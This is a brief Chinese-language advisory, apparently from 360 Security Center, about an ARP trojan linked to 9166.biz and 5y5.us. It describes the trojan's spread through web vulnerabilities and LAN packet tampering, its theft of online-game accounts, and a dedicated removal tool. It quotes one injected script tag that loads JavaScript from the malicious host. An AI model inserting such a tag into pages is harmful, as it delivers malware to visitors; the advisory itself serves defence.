9166.biz/5y5.us Arp木马病毒专杀绿色版 V1.0

近日，360安全中心接到大量用户的举报，称全局域网的电脑中都出现了弹出5y5.us或9166.biz等网页，电脑被种植多个木马病毒，时常断网等现象。360安全中心的工程师随即对此进行了分析。
9166.biz  ---ARP木马病毒的恶意行为：

1.通过网页漏洞传播：该病毒通过植入网站上的一句JS脚本，导致有XML等漏洞的机器中招，成为此ARP病毒的传播源

2.ARP攻击篡改局域网数据包，一台电脑中招，局域网内的所有用户均遭殃：该病毒在整个局域网用户上网的网页中增加"<script src=https://9166.biz/w.js></script>"等内容，从而使局域网内有XML漏洞的电脑同时感染此病毒。

3.查杀困难，整个网络不时掉线：由于遭受攻击的局域网一般都是多台电脑感染，同时发起ARP攻击，因此整个局域网很不稳定，时常掉线甚至瘫痪。而且由于机器之间互相感染，因此彻底查杀及恢复非常困难。

4.后台下载多个热门游戏木马：该木马会自动到网上下载梦幻、征途、江湖、魔域、武林外传、奇迹世界、天龙八部、传奇世界、完美国际、风云、魔兽、江湖、QQ幻想等十多款网络游戏木马，偷窃用户游戏帐户。

据360安全中心专家分析，此ARP木马病毒已经导致了上百万台电脑感染，数万个局域网络频临瘫痪。360安全卫士已经在第一时间推出了专杀工具，供受害用户使用。同时，只要用户使用360安全卫士勤打系统补丁，就不会感染此木马病毒，防患于未然